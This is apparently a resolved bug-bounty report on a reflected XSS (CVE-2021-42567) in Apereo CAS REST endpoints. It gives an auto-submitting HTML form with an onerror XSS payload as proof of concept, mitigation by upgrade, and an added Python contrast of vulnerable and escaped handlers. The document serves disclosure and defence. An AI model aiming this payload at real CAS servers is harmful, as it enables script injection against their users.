CVE-2021-42567 - Apereo CAS Reflected XSS on https://█████████
Medium
Vulnerability Details
Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. CAS is vulnerable to a reflected cross-site scripting attack via POST requests sent to the REST API endpoints; the payload can be injected on the URLs /███████/. Malicious scripts can be submitted to CAS via parameters such as the ticket id or the username. CAS rejects the request and produces a response in which the value of the vulnerable parameter is echoed back unencoded, so the script executes in the browser.
VULNERABLE SITE: https://██████████
VULNERABLE ENDPOINT: https://███████/█████████/
PROOF OF CONCEPT:
-----------------------
* It seems easy: you just need to drop the XSS payload inside the "username" parameter or at the end of the endpoint's path (URL-encoded, of course). Apereo CAS rejects the request and echoes the ticket ID or the username back in the HTTP response without sanitizing it.

```html
<html>
<body onload="document.forms[0].submit()">
<form action="https://█████████/████████/" method="POST">
<input type="hidden" name="username" value="<img/src/onerror=alert(document.domain)>" />
<input type="hidden" name="password" value="Mellon" />
</form>
</body>
</html>
```

* Save the above HTML code as xss.html
* Open it in the browser
* You can see that the XSS is triggered via a POST request.
## Impact
Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
REFERENCES:
---------------
* https://apereo.github.io/2021/10/18/restvuln/
* https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
* https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md
* https://nvd.nist.gov/vuln/detail/CVE-2021-42567
* https://github.com/apereo/cas/releases
Best Regards,
3th1c_yuk1
## System Host(s)
█████████
## Affected Product(s) and Version(s)
Apereo CAS
## CVE Numbers
CVE-2021-42567
## Steps to Reproduce
See the PROOF OF CONCEPT section above; the steps are the same.
## Suggested Mitigation/Remediation Actions
Check the server's version and update. Do not rely on versions 6.3.7.1 and 6.4.2; update to versions 6.3.7.4 and 6.4.4.2 to mitigate this XSS.
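The vulnerable pattern the report describes, beside two hardened forms, as an added Python illustration that is not the report's or Apereo's code: a stand-in error handler that echoes the rejected username raw into an HTML body, the same handler with HTML encoding and `X-Content-Type-Options: nosniff`, a REST-style JSON rejection, and the reflection check a triager would apply to a response. The handler names, the `Response` class and the 401 status are assumptions.

```python
import html
import json
from dataclasses import dataclass, field

# Constructed payload, identical to the one used in the proof of concept above.
PAYLOAD = "<img/src/onerror=alert(document.domain)>"


@dataclass
class Response:
    status: int
    content_type: str
    body: str
    headers: dict = field(default_factory=dict)


def reject_vulnerable(username: str) -> Response:
    """Illustrative vulnerable pattern (not CAS code): the rejected parameter is
    interpolated raw into an HTML error page, so any markup in it gets rendered."""
    body = f"<html><body>Authentication failed for user: {username}</body></html>"
    return Response(401, "text/html", body)


def reject_hardened_html(username: str) -> Response:
    """Hardened HTML variant: HTML-encode the reflected value and add nosniff."""
    body = (f"<html><body>Authentication failed for user: "
            f"{html.escape(username, quote=True)}</body></html>")
    return Response(401, "text/html; charset=utf-8", body,
                    {"X-Content-Type-Options": "nosniff"})


def reject_hardened_json(username: str) -> Response:
    """Hardened REST variant: a JSON body is data, not a document the browser
    renders, and nosniff stops the browser from second-guessing the type.
    Better still is not to echo the submitted value at all."""
    body = json.dumps({"error": "authentication failed", "username": username})
    return Response(401, "application/json", body,
                    {"X-Content-Type-Options": "nosniff"})


def reflects_unescaped(resp: Response, value: str) -> bool:
    """Triage check: the raw payload appears verbatim in a body that the browser
    will render as HTML, which is the condition for a reflected XSS."""
    is_html = resp.content_type.lower().startswith("text/html")
    return is_html and value in resp.body


if __name__ == "__main__":
    for fn in (reject_vulnerable, reject_hardened_html, reject_hardened_json):
        r = fn(PAYLOAD)
        print(f"{fn.__name__:22s} reflects raw payload: {reflects_unescaped(r, PAYLOAD)}")
```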
Report Stats
- Report ID: 1446236
- State: Closed
- Substate: resolved
- Upvotes: 2